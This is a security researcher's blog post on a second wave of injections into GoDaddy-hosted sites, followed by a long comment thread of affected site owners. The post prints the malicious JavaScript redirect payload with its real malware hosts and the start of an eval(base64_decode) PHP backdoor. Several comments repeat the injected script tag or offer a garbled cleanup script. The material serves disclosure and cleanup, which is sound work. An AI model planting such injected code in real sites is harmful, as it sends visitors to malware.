Second round of GoDaddy sites hacked

It seems that a second round of attacks are happening today at GoDaddy and infecting all kind of sites (Joomla, Wordress,etc). Looking at the modification dates on the files, they all happened May 1st (today) during the morning from 1 to 3/4 am.

All of them had the following javascript added to their pages:

script src= http://kdjkfjskdfjlskdjf.com/kp.php

Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.

This is how this kb.php file looks like:

function setCookie(c_name,value,expiredays)
{
var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ “=” +escape(value)+ ((expiredays==null) ? “” :
“;expires=”+exdate.toGMTString()); } function getCookie(c_name){
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + “=”);
if (c_start!=-1) { c_start=c_start + c_name.length+1;
c_end=document.cookie.indexOf(“;”,c_start);
if (c_end==-1) c_end=document.cookie.length; return
unescape(document.cookie.substring(c_start,c_end)); } } return “”; } var
name=getCookie(“pma_visited_theme1″); if (name==””){ setCookie(“pma_visited_theme1″,”1″,20);
var
url=”http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D”; window.top.location.replace(url);
}else{ }

As you can see, very similar to the previous attack, also loading malware from this *.xorg.pl domain…

If your site got hacked, open your index files and look for this string on the top of it:

< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYha
XNzZXQoJEdMT0JBTFNbJ2..

Removing that from all your index files should solve the problem.

If you are using WordPress, all the *.php files inside your themes folder got modified. So, you have to clean them too.

UPDATE 1 – People are starting to complain on the WordPress forums: http://wordpress.org/support/topic/394255.

UPDATE 2tweeted about it saying that it is related only to WordPress. It is affecting all platforms there.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Anonymous

    Any idea why NS has blocked some of us customers from being able to get into our sites via FTP since last night?

  • ʌǝnxus

    i found 4 link source from google (2 from here).
    but see this.
    http://i42.tinypic.com/51pkkm.jpg
    how can?

  • Anonymous

    My site was hacked twice this week. wordpress godaddy

  • Anonymous

    Is this a new WP exploit? Or are they running in a shared environment owned by the apache (or whoever) user?

  • Anonymous

    Is this a new WP exploit? . . . .

    From what I am seeing the criminals have discovered a way to rapidly attack and overwhelm everything. Not just WordPress. Obviously they found security holes to exploit to get their bombs and booby traps into the host system.

  • Anonymous

    Have been on the phone with Godaddy twice today and they are blaming WordPress.

    My wordpress install was up to date.

    Plugins up to date.

    Have an .htaccess file that restricts wp-admin use

    File permissions tight

    ALL of my passwords contain letters, numbers, caps, no caps, and characters other than numbers and letters.

    I also changed all passwords from a clean machine after the attack a couple of weeks ago.

    My computer is virus free.

    I restored my website from a clean install the last time, so nothing was left behind for a second attack.

    I have lost almost two weeks trying to fix this issue.

    How can GoDaddy continue to say it wasn't their fault when all of the sites involved with this hack early this morning were hosted there?

  • http://www.google.com/profiles/100503221792836377133?hl=en 100503221792836377133

    Because, GoDaddy stores passwords in plain text, and they have no commitment to customer's satisfaction just profit.

  • Anonymous

    it's not just wordpress, every single PHP file on the server was changed… (mailform file, a joomla test site i had installed, + i have 3 wordpress sites) i used godaddy's file manager to restore them all to before 5/1 and seems to have fixed it but not sure if there's some leak where it can/will happen again.
    -annoyed but pacified

  • http://www.vqdn.com/ Ben

    "…not sure if there's some leak where it can/will happen again."

    If they exploited your site the first time, and you haven't changed anything, does it not seem highly likely that your site will be hacked again if the exploit is still available for the blackhats to use?

  • Anonymous

    Second time for me too today, with WP on GoDaddy… But what's this cookie business? Is it setting a cookie for reinfection, could that explain why it came back?

    Will clearing cookies help (I usually never do), on top of everything else?

  • http://www.bobbysandhulive.com bobby sandhu

    It happened to my websites the same time.. and second time in 10 mdays. I removed everything from my root directory and restored the website from local end. Its running fine now. The only issue might be its returning back.

    Godaddy isnt respoding well, they are running me in circles and arent admitting that its a server side infection.

  • Anonymous

    I was called in to look at some hosting servers at a small company that got hit with something similar to this earlier this year. Their hosted sites were php, asp and coldfusion sites (no wordpress, joomla or any sort of control panel). All index/home/main/default files – regardless of whether they were php, asp, cfm or even html had various javascripts included. It certainly looked like it was an FTP exploit with either privilege escalation so their bot could traverse user directories and write, or they somehow got the ftp user/pass db. Logs did not indicate brute force attacks. File changes came from multiple locations around the world.

  • http://dailyplateofcrazy.com BigLittleWolf

    My site has also been hit twice this week. Can you be more specific about exactly what (in the above) you remove?

    I can see the < ?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvY

    in the index file. I'm a writer, not a coder. Remove beginning with exactly which character?

    Also, Godaddy said it was an issue of not being upgraded. I was upgraded, to my knowledge. Conflicting information from 3 different Godaddy support reps – all extremely professional and trying to help – but no solution.

    Uncertain what to do next.

    Thank you for whatever additional information you can provide.

  • Anonymous

    Uncertain what to do next. . .

    Remain calm, take it one step at a time. I'll add a quote from an acquaintance.

    "But realize that if the hack is coming through someone hacking the web hosting company (and not necessarily your blog), there's little you can do to stop the hacker."

  • http://godaddy.com Salem

    All,

    We're actively working to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK .

    Please note that we also investigated and found the cause of the issue last week, and while there are similarities, we're treating this as a new and separate issue.

    As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware on other CMS applications have the commonality that part of the site is powered by WordPress.

    Again, we are actively and aggressively working to identify the cause and we've published a means to correct it – http://fwd4.me/MFK .

    ^Salem

  • Anonymous

    Hello,

    My site was attacked too and I have just my own custom cms … no wordpress. One hole that I find is that files like "somthing.php.jpg" or "somthing.php.somthing" was parsing like normal ".php" files. This is not the cause of this attack but just to let you know…

    second I have few godaddy site on same FTP and just one site is infected. This means that is not used ours FTP accunts to do that

    third on first attack I put the file that can not be writed and this file wasnt changed… maybe temporary solution is to put to all php files that can not be changed

    forth if was outside we will easly find script and from log and we will read which script was started

    hope I help somebody

  • http://www.neowin.net/forum/topic/897610-godaddy-god-hacked-yesterday/ Tony

    There is more technical details about this hack attempt here:

    http://www.neowin.net/forum/topic/897610-godaddy-god-hacked-yesterday/

  • Anonymous

    Im this anonymous from above :)… Its look like is this hole that I find…

    One hole that I find is that files like "somthing.php.jpg" or "somthing.php.somthing" was parsing like normal ".php" files.

    this hole that they are used to go on our servers.

  • Anonymous

    Checking through all the blogs about what to do this situation and seeing many of them with no secure security information available and a grey question mark next to them.

  • Anonymous

    Okay finally figured out my security strategy for my WP Blog.
    http://www.taosecurity.com/images/symantec_soc.jpg

  • Anonymous

    I just discovered this morning, May 3 here, that my Godaddy site is hacked. It is a simple PHP site and it is hacked with redirects to a rogue security malware site. The puzzing thing is that I cannot find any extra code in the index.php file. I haven't yet heard from Godaddy on this.

  • Anonymous

    Addendum to earlier post -
    Taking a closer look, I discovered that on the index.php page, it had sneakily added the link
    < script src="http://kdjkfjskdfjlskdjf.com/kp.php">

    to the middle of the Google Analytics tracking code!
    On other pages, it added the gunzipped code.

  • ʌǝnxu

    @ 100503221792836377133
    plain text for the godaddy login or just the cms config file??
    if the cms, most of of cms do same.they store the pass on plain text.
    read on wordpress answer on ns case before.

  • Anonymous

    I got a BS form reply from GoDaddy implying that it was our fault (due to insecure password, or fault of 3rd party software, etc.) It really made me angry. Ours isn't WordPress or Joomla, it is just a simple site with PHP page extensions. If anyone starts a class action lawsuit over this, I'll join!

  • Anonymous

    I have no wordpress site, no upload still got injections of code…

  • Anonymous

    Hi,

    I searched few days and I got some conclusion hope help somebody.

    1. Goddady have a executing multiextension files example:
    somthing.php.jpg

    This is a security known issue:
    http://core.trac.wordpress.org/ticket/11122

    to fix that on GoDaddy try add this in .htaccess
    RemoveHandler application/x-httpd-php .php

    SetHandler x-httpd-php5

    SetHandler x-httpd-php5-source

    I tested on my site and seams that work.

    2. The injections affected two my sites with custom cms, one site do not have upload at all.

    3. put all php files to unwritable seems to stop injection

    I think that injections come from inside server becouse GoDaddy hosting will easly find it if starts from outside.

  • Anonymous

    What it comes down to is how do we protect our investment against attacks against Shared Hosting services and attacks against poorly maintained and insecure WordPress installs.

    Not a pretty picture.

  • Anonymous

    Glad I don't have anything at godaddy as far as hosting wise cause i couldn't stand to have that sh*t happen to me after working on something for hours or days, im glad i started my own hosting company about 2 years ago tomorrow. :) good luck to those who stay, im not gonna let it happen to me!

  • http://www.neowin.net/forum/topic/897610-godaddy-god-hacked-yesterday/ TonyLock

    Some dushbag from GoDaddy came and posted a responses after my friend called them to say he was looking to sue them. Have a read of "Salem's" post here and my responses: http://www.neowin.net/forum/topic/897610-godaddy-god-hacked-yesterday/

  • Anonymous

    I'll be blunt and honest. WordPress also needs to get it together and start providing regular security updates. Not just new versions with bells and whistles many people don't want and will never use. If they can't handle this responsibility they should make their software Proprietary. The bottom line is it's not secure.

  • Anonymous

    Other open source software products stay on top of security updates and patches holes and security vulnerabilities and provides updates to end users.

    Why doesn't WordPress?

  • http://www.blogger.com/profile/04766576768508194924 Tim Hampton

    It's not just WordPress that suffers from this problem. I'm running my site on Expression Engine and I had this problem happen back on February 11th of this year, and then it happened again on April 25th and May 1st. GoDaddy's nonetheless giving me the same run-around that y'all are getting.

    I'm a little calmer knowing it's not just me that's suffering….

  • Anonymous

    One of my sites on GoDaddy was hacked for second time the last May 1st as well in the morning. The first time was on April 22. I'm not using any framework like wordpress or something like that, it's a website made totally by me. I don't know what the hell to do to solve this.. I lost almost $1000 with this hack during the time my site was off… I contacted the first time to Godaddy support and they said it was my fault. GoDaddy sucks, this seems to be a GoDaddy problem!!

  • Anonymous

    I run a Drupal site, its ranked in the 200,000s by Alexa. Thank you so much for writing this article.

    Those fuckers inserted this damn line of code:
    < script src="http://kdjkfjskdfjlskdjf.com/kp.php">

    In many of the files in my main directory and many of the files in my "themes/" directory. I was obvious which ones I needed to cut the piece of shit code out of and save as they were all modified on 4/30/2010. GoDaddy does suck, they were no help at all.

  • Qabandi

    I posted a last resort solution on the wordpress dicussion page 2, only use it if you cant backup to a date prior to 1st of may.

  • Carlos

    Hit the third time this month. First time it took me 10 hours STRIGHT to fix it. Now only 20 minutes. I WANT TO SUE THEIR ASSES. I work on the web and make a living out of websites and this just plain sucks!!!

  • Anonymous

    This just happened to me today for the first time. Godaddy hosting but NO WORDPRESS. It changed all my PHP files to load a script from indesignstudioinfo.com.

    Assholes… and I was already planning to move my hosting away from Godaddy next week!

  • Anonymous

    This also happened to me today for the first time. GoDaddy hosting, no WordPress, just my own PHP files. It added to all of my PHP files: .

    After reading all of the postings, this certainly ups the priority of moving my hosting away from GoDaddy.

  • http://www.blogger.com/profile/04175060974072874551 Russell

    Happened here too, no WordPress either. Nothing in my access logs, no evidence of a hack just the code insertion on line 1.

    I highly doubt it is WordPress related and some servers may have been compromised.

  • Anonymous

    It also adds another file to the root public_html directory or even 2 files, you need to remove those as well.

  • Anonymous

    my site is messed up..

    i use wordpress on godaddy.

    i called go daddy they told me to call wordpress

    wordpress has no listed number.

    i call god now!!!

  • Anonymous

    LET's GO EVERYBODY TO HOSTGATOR… GODADDY SucKS!!! GODADDY SUCKS ! THEY SAY IT ISNT OUR FAULT! FUCK YOU GODADDY!!

  • http://www.blogger.com/profile/04870808404524736502 ladyrachelkent

    This issue is also affecting my Joomla on GoDaddy so it's probably a PHP vulnerability, server vulnerability or some common extension code.

  • Anonymous

    Here is code I used to clean up our site, it only runs on linux, but it helped to clean out off the garbage. Use at your own risk!

    [code]
    #!/bin/sh

    root="path-to-offline-web-root"
    output="path-to-dir-to-put-clean-files"

    mkdir $output

    cd $root;
    list=`find . -type f -name '*.php' -exec ls {} \;`

    IFS='
    ';

    for f in $list
    do
    echo $f;
    cat "$f" | sed -e '/ "$f.tmp"
    mv "${f}.tmp" "${f}"
    done

    [/code]

  • Anonymous

    Mine got attacked 2x and GoDaddy said it isn't their fault it happened. They said it was due to an outdated WordPress. I don't use wordpress, I have up-to-date joomla lol. then the stupid support team goes on not reading my question to them and how I don't get what is going on and they think I am crazy because I am the only case. I told them I am not the only case, google it. I told them it is something in the server itself, shared , etc. they said they looked and found nothing.

    uh-huh.

    Then how are people getting the same attack?!?!?! Then a dude from GoDaddy told me that the attack happened because I tried out WordPress TWO years ago, and I had used their uninstaller and they said the files were not gone. I told the dude, they were gone because I am a cpu tech person and I like to make sure they are gone. I am like that.

    GoDaddy really doesn't care what the customer has to say and it frustrates me. I wrote an article about this on my website today about this and also said if they don't fix this issue soon, they will be loosing a lot of business. Period. Thanks to GoDaddy my website was flagged once by Microsoft. I lost some business.

    What did GoDaddy say to that?

    It wasn't their fault and I need to update my wordpress files.

    and again I have JOOMLA! what the heck does that have to do with WP?!? Geez GoDaddy!

  • jeev

    ya guys for me also same issue from go daddy..my site hacked three times in two weeks..i really lost many regular visitors..i think go daddy become an useless provider..they taking more money than others and poor service..i already shifted from go daddy..i don't need "its not our fault" guys.

  • Anonymous

    It has happened AGAIN!!! Our non- WordPress, non-CMS plain PHP site on Godaddy, http://toucanmultimedia.com has been hacked again, with base 64 encoded code inserted in all files with PHP extensions, same as a week ago.

  • Anonymous

    I'm just wondering, specifically, what the symptoms of this new hack would be? Immediately, I suspected my site was hacked (before I even read this thread), when I launched my hosting control, went to the file manager, and was completely missing my "Current" file panel (rather, the file directory). I show files in my main window, but I have no access to them, like, at all. I can't even restore them from the history panel (it just loads infinitely).

    Was I hacked, do you think?

  • http://www.blogger.com/profile/04628414779240351850 Mark

    I'm running Drupal on my GoDaddy based hosting and I too had the base64 encoded hack show up on all of my .php files, not just the Drupal specific files. Part of me is relieved that I'm not the only one experiencing this problem but I'm furious with GoDaddy, as it has cost my site a great deal of traffic and worse yet, eroded the trust with our users.

  • Ivo

    Hacked here too, also eval decode base64… I have millions of php files injected with shitty code… not cool, not fair it sucks asss!!! fak em

  • http://www.blogger.com/profile/09461530513715661711 Singha

    I'm on Bluehost, and have two tikiwiki sites and two drupal sites that have this same hack. The fix from Sucuri here has not helped at all. Anybody have any idea what I can do to get my sites back online?

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Singha:

    Can you send me your site name? I will take a look for you.

    • Jerkyg

      my account got hacked by my old biz partner. godaddy was of no help. if anyone has any suggestions…i would appreciate it.

      thanks

      jerkyg@gmail.com

  • Anonymous

    I've removed wordpress completely and it's still hacking my site once a month or so. Ahhhhhhhh

  • Pingback: Selfhosting or not: Hackers()

  • Pingback: WordPress Security 101: Securing your Site()

  • http://twitter.com/Fitnesshelp_ Tony